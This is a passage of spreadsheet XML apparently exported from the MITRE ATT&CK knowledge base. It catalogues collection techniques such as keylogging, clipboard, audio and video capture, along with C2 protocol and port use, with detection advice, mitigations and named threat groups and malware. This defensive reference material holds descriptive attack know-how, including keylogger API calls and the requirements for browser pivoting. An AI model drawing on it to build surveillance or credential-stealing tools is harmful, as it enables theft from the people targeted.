Identify and block potentially malicious software that may be used to record audio by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1123</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [[Technique/T1064|Scripting]] to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [[Technique/T1083|File and Directory Discovery]] and [[Technique/T1105|Remote File Copy]] to identify and move files.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Data loss prevention</t>
  </si>
  <si>
    <t>Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [[Technique/T1074|Data Staged]]. As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. A keylogger installed on a system may be able to intercept passwords through [[Technique/T1056|Input Capture]] and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [[Technique/T1110|Brute Force]] techniques.
Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Permissions to access directories and files that store information of interest.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1119</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.[[CiteRef::Wikipedia Man in the Browser]]
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.[[CiteRef::Cobalt Strike Browser Pivot]]
Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication[[CiteRef::cobaltstrike manual]].</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>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
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [[Technique/T1113|Screen Capture]] due to use of specific devices or applications for video recording rather than capturing the victim's screen.</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,API monitoring</t>
  </si>
  <si>
    <t>Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data. ,</t>
  </si>
  <si>
    <t>Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.
Identify and block potentially malicious software that may be used to capture video and images by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1125</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. 
===Windows===
Applications can access clipboard data by using the Windows API.[[CiteRef::MSDN Clipboard]] 
===Mac===
OSX provides a native command, &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents [[CiteRef::Operating with EmPyre]].</t>
  </si>
  <si>
    <t>API monitoring</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on a Windows system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity. ,</t>
  </si>
  <si>
    <t>Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1115</t>
  </si>
  <si>
    <t>Collected data is staged in a central location or directory prior to [[Exfiltration]]. Data may be kept in separate files or combined into one file through techniques such as [[Technique/T1002|Data Compressed]] or [[Technique/T1022|Data Encrypted]].
Interactive command shells may be used, and common functionality within [[Software/S0106|cmd]] and bash may be used to copy data into a staging location.</t>
  </si>
  <si>
    <t>Software: ADVSTORESHELL, NETUI, ...</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] stores output from command execution in a .dat file in the %TEMP% directory.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>Adversaries may target user email to collect sensitive information from a target.
Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network.
Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access.</t>
  </si>
  <si>
    <t>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
===Mac===
On OSX, the native command &lt;code&gt;screencapture&lt;/code&gt; is used to capture screenshots.
===Linux===
On Linux, there is the native command &lt;code&gt;xwd&lt;/code&gt;.[[CiteRef::Antiquated Mac Malware]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used a script to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0152|EvilGrab]] has the capability to capture video from a victim machine.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0152|EvilGrab]] has the capability to capture audio from a victim machine.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>A [[Software/S0170|Helminth]] VBScript receives a batch script to execute a set of commands in a command prompt.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] scans processes on all victim systems in the environment and uses automated scripts to pull back the results.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used automated collection.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] collects data from the clipboard.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>For all non-removable drives on a victim, [[Software/S0136|USBStealer]] executes automated collection of certain files for later exfiltration.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>The executable version of [[Software/S0170|Helminth]] has a module to log clipboard contents.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0004|TinyZBot]] contains functionality to collect information from the clipboard.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] copies and exfiltrates the clipboard contents every 30 seconds.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Collection,Credential Access</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Darkhotel</t>
  </si>
  <si>
    <t>Darkhotel ,</t>
  </si>
  <si>
    <t>G0012</t>
  </si>
  <si>
    <t>[[Group/G0012|Darkhotel]] uses a sophisticated keylogger.[[CiteRef::Kaspersky Darkhotel]]</t>
  </si>
  <si>
    <t>Windows Registry,Kernel drivers,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsynceyState.[[CiteRef::Adventures of a Keystroke]] Monitor the Registry and file system for such changes and detect driver installs, as well as looking for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.
Monitor the Registry for the addition of a Custom Credential Provider.[[CiteRef::Wrightson 2012]] Detection of compromised [[Technique/T1078|Valid Accounts]] in use by adversaries may help to catch the result of user input interception if new techniques are used. ,</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be used to acquire credentials or information from the user by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
In cases where this behavior is difficult to detect or mitigate, efforts can be made to lessen some of the impact that might result from an adversary acquiring credential information. It is also good practice to follow mitigation recommendations for adversary use of [[Technique/T1078|Valid Accounts]].</t>
  </si>
  <si>
    <t>John Lambert, Microsoft Threat Intelligence Center</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1056</t>
  </si>
  <si>
    <t>[[Software/S0004|TinyZBot]] contains keylogger functionality.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can track key presses with a keylogger module.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Malware used by [[Group/G0043|Group5]] is capable of capturing keystrokes.[[CiteRef::Citizen Lab Group5]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] can deploy a tool to perform keylogging.[[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>DragonOK</t>
  </si>
  <si>
    <t>DragonOK ,</t>
  </si>
  <si>
    <t>G0017</t>
  </si>
  <si>
    <t>Software: PoisonIvy, Poison Ivy</t>
  </si>
  <si>
    <t>[[Software/S0012|PoisonIvy]] contains a keylogger.[[CiteRef::FireEye Poison Ivy]]</t>
  </si>
  <si>
    <t>Software: Carbanak, Anunak</t>
  </si>
  <si>
    <t>[[Software/S0030|Carbanak]] contains keylogger functionality.[[CiteRef::Kaspersky Carbanak]]</t>
  </si>
  <si>
    <t>The executable version of [[Software/S0170|Helminth]] has a module to log keystrokes.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>Software: CHOPSTICK, SPLM, ...</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] is capable of performing keylogging.[[CiteRef::Crowdstrike DNC June 2016]][[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used a keylogging tool called KEYPUNCH.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>Carbanak</t>
  </si>
  <si>
    <t>Carbanak Anunak Carbon Spider ,</t>
  </si>
  <si>
    <t>G0008</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors installed a credential logger on Microsoft Exchange servers.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has used a keylogging tool that records keystrokes in encrypted files.[[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] can log keystrokes.[[CiteRef::Trend Micro Daserf Nov 2017]][[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware KiloAlfa contains keylogging functionality.[[CiteRef::Novetta Blockbuster Tools]]</t>
  </si>
  <si>
    <t>PittyTiger</t>
  </si>
  <si>
    <t>PittyTiger ,</t>
  </si>
  <si>
    <t>G0011</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can record keystrokes from both the keyboard and virtual keyboard.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>Software: gh0st</t>
  </si>
  <si>
    <t>The [[Software/S0032|gh0st]] RAT has a keylogger.[[CiteRef::Alintanahin 2014]]</t>
  </si>
  <si>
    <t>has used keylogging tools.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] contains a keylogger component.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has run a keylogger plug-in on a victim.[[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>Software: FakeM</t>
  </si>
  <si>
    <t>[[Software/S0076|FakeM]] contains a keylogger module.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>Naikon</t>
  </si>
  <si>
    <t>Naikon ,</t>
  </si>
  <si>
    <t>G0019</t>
  </si>
  <si>
    <t>Software: SslMM</t>
  </si>
  <si>
    <t>[[Software/S0058|SslMM]] creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>Moafee</t>
  </si>
  <si>
    <t>Moafee ,</t>
  </si>
  <si>
    <t>G0002</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware is capable of keylogging.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0152|EvilGrab]] has the capability to capture keystrokes.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>When it first starts, [[Software/S0128|BADNEWS]] spawns a new thread to log keystrokes.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Software: Unknown Logger</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] is capable of recording keystrokes.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Molerats</t>
  </si>
  <si>
    <t>Molerats Operation Molerats Gaza Cybergang ,</t>
  </si>
  <si>
    <t>G0021</t>
  </si>
  <si>
    <t>Software: DustySky, NeD Worm</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] contains a keylogger.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>Adversaries can use methods of capturing user input for obtaining credentials for [[Technique/T1078|Valid Accounts]] and information [[Collection]] that include keylogging and user input field interception.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,[[CiteRef::Adventures of a Keystroke]] but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.[[CiteRef::Wrightson 2012]]
Keylogging is likely to be used to acquire credentials for new access opportunities when [[Technique/T1003|Credential Dumping]] efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
Adversaries may also install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [[Technique/T1133|External Remote Services]] and [[Technique/T1078|Valid Accounts]] or as part of the initial compromise by exploitation of the externally facing web service.[[CiteRef::Volexity Virtual Private Keylogging]]</t>
  </si>
  <si>
    <t>admin@338</t>
  </si>
  <si>
    <t>admin@338 ,</t>
  </si>
  <si>
    <t>G0018</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] uses a keylogger and steals clipboard contents from victims.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>Software: OwaAuth</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] captures and DES-encrypts credentials before writing the username and password to a log file, &lt;code&gt;C:\log.txt&lt;/code&gt;.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Software: HTTPBrowser, Token Control, HttpDump</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] is capable of capturing keystrokes on victims.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>APT18</t>
  </si>
  <si>
    <t>APT18 Threat Group-0416 TG-0416 Dynamite Panda ,</t>
  </si>
  <si>
    <t>G0026</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure[[CiteRef::XAgentOSX]].</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can perform keylogging.[[CiteRef::ESET Sednit Part 2]][[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>Collection,Persistence</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.[[CiteRef::Wikipedia Browser Extension]][[CiteRef::Chrome Extensions Definition]]
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded.[[CiteRef::Malicious Chrome Extension Numbers]] Once the extension is installed, it can browse to websites in the background,[[CiteRef::Chrome Extension Crypto Miner]] steal all information that a user enters into a browser, to include credentials,[[CiteRef::Banker Google Chrome Extension Steals Creds]][[CiteRef::Catch All Chrome Extension]] and be used as an installer for a RAT for [[persistence]]. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.[[CiteRef::Stantinko Botnet]] There have also been similar examples of extensions being used for command &amp; control [[CiteRef::Chrome Extension C2 Malware]].</t>
  </si>
  <si>
    <t>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may would prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation. ,</t>
  </si>
  <si>
    <t>Only install browser extensions from trusted sources that can be verified. Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.
Browser extensions for some browsers can be controlled through Group Policy. Set a browser extension white or black list as appropriate for your security policy.[[CiteRef::Technospot Chrome Extensions GP]]
Change settings to prevent the browser from installing extensions without sufficient permissions.
Close out all browser sessions when finished using them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1176</t>
  </si>
  <si>
    <t>Command and Control</t>
  </si>
  <si>
    <t>Standard Application Layer Protocol</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] can use HTTP or HTTPS for command and control to hard-coded C2 servers.[[CiteRef::F-Secure The Dukes]][[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</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</si>
  <si>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for the port that is being used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1071</t>
  </si>
  <si>
    <t>Various implementations of [[Software/S0023|CHOPSTICK]] communicate with C2 over HTTP, SMTP, and POP3.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0048|PinchDuke]] transfers files from the compromised host via HTTP or HTTPS to a C2 server.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] malware often uses HTTP and DNS for C2. The group has also used the Plink utility and other tools to create tunnels to C2 servers.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] can use HTTP or DNS for C2.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>Software: HAMMERTOSS, HammerDuke, NetDuke</t>
  </si>
  <si>
    <t>The "Uploader" variant of [[Software/S0037|HAMMERTOSS]] visits a hard-coded server over HTTP/S to download the images [[Software/S0037|HAMMERTOSS]] uses to receive commands.[[CiteRef::FireEye APT29]]</t>
  </si>
  <si>
    <t>Software: CozyCar, CozyDuke, ...</t>
  </si>
  <si>
    <t>[[Software/S0046|CozyCar]]'s main method of communicating with its C2 servers is using HTTP or HTTPS.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>APT16</t>
  </si>
  <si>
    <t>APT16 ,</t>
  </si>
  <si>
    <t>G0023</t>
  </si>
  <si>
    <t>Software: ELMER</t>
  </si>
  <si>
    <t>[[Software/S0064|ELMER]] uses HTTP for command and control.[[CiteRef::FireEye EPS Awakens Part 2]]</t>
  </si>
  <si>
    <t>Software: Pisloader</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] uses DNS as its C2 protocol.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] has used HTTP, HTTPS, and DNS for command and control.[[CiteRef::ThreatStream Evasion Analysis]][[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Software: OLDBAIT, Sasfis</t>
  </si>
  <si>
    <t>[[Software/S0138|OLDBAIT]] can use HTTP or SMTP for C2.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] uses HTTP for C2.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>Software: JHUHUGIT, Seduploader, ...</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] communicates with its C2 server over HTTP.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] malware has used HTTP for C2.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] used SMTP as a communication channel in various implants, initially using self-registered Google Mail accounts and later compromised email servers of its victims. Later implants such as [[Software/S0023|CHOPSTICK]] use a blend of HTTP and other legitimate channels, depending on module configuration.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] can use HTTP and DNS for C2 communications.[[CiteRef::FireEye APT34 Dec 2017]][[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>Software: Komplex</t>
  </si>
  <si>
    <t>The [[Software/S0162|Komplex]] C2 channel uses HTTP POST requests.[[CiteRef::Sofacy Komplex Trojan]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] connects to port 80 of a C2 server using Wininet API.[[CiteRef::Kaspersky Sofacy]]</t>
  </si>
  <si>
    <t>Software: CORESHELL, SOURFACE</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] can communicate over HTTP, SMTP, and POP3 for C2.[[CiteRef::FireEye APT28]][[CiteRef::Microsoft SIR Vol 19]]</t>
  </si>
  <si>
    <t>Uncommonly Used Port</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware has communicated with its C2 server over ports 4443 and 3543.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process use of network,Process monitoring</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</si>
  <si>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used.[[CiteRef::University of Birmingham C2]] ,</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports. 
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1065</t>
  </si>
  <si>
    <t>Software: NETEAGLE</t>
  </si>
  <si>
    <t>[[Software/S0034|NETEAGLE]] will attempt to detect if the infected host is configured to a proxy. If so, [[Software/S0034|NETEAGLE]] will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000. [[Software/S0034|NETEAGLE]] will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2. Adversaries can also use [[Software/S0034|NETEAGLE]] to establish an RDP connection with a controller over TCP/7519.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>Software: BACKSPACE, Lecna</t>
  </si>
  <si>
    <t>[[Software/S0031|BACKSPACE]] uses HTTP as a transport to communicate with its command server.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>Software: SOUNDBITE</t>
  </si>
  <si>
    <t>[[Software/S0157|SOUNDBITE]] communicates via DNS for C2.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS.  In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol.  All protocols use their standard assigned ports.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>Software: Volgmer</t>
  </si>
  <si>
    <t>has communicated to its C2 server over port 8088.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] uses HTTP and HTTPS for C2.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>Software: PlugX, Sogu, Kaba</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] can be configured to use HTTP or DNS for command and control.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>An [[Group/G0022|APT3]] downloader establishes SOCKS5 connections to two separate IP addresses over TCP port 1913 and TCP port 81.[[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>Some [[Group/G0032|Lazarus Group]] malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes uncommonly used ports such as 995, 1816, 465, 1521, 3306, and many others.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>[[Group/G0043|Group5]] C2 servers communicated with malware over TCP 8081, 8282, and 8083.[[CiteRef::Citizen Lab Group5]]</t>
  </si>
  <si>
    <t>Software: GeminiDuke</t>
  </si>
  <si>
    <t>[[Software/S0049|GeminiDuke]] uses HTTP and HTTPS for command and control.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>APT12</t>
  </si>
  <si>
    <t>APT12 IXESHE DynCalc Numbered Panda DNSCALC ,</t>
  </si>
  <si>
    <t>G0005</t>
  </si>
  <si>
    <t>Software: RIPTIDE</t>
  </si>
  <si>
    <t>[[Group/G0005|APT12]] has used [[Software/S0003|RIPTIDE]], a RAT that uses HTTP to communicate.[[CiteRef::Moran 2014]]</t>
  </si>
  <si>
    <t>Software: CloudDuke, MiniDionis, CloudLook</t>
  </si>
  <si>
    <t>One variant of [[Software/S0054|CloudDuke]] uses HTTP and HTTPS for C2.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>Software: MiniDuke</t>
  </si>
  <si>
    <t>[[Software/S0051|MiniDuke]] uses HTTP and HTTPS for command and control.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>Software: OnionDuke</t>
  </si>
  <si>
    <t>[[Software/S0052|OnionDuke]] uses HTTP and HTTPS for C2.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>Software: BUBBLEWRAP, Backdoor.APT.FakeWinHTTPHelper</t>
  </si>
  <si>
    <t>[[Software/S0043|BUBBLEWRAP]] can communicate using HTTP or HTTPS.[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can use port 995 for C2.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks.[[CiteRef::Volexity OceanLotus Nov 2017]]</t>
  </si>
  <si>
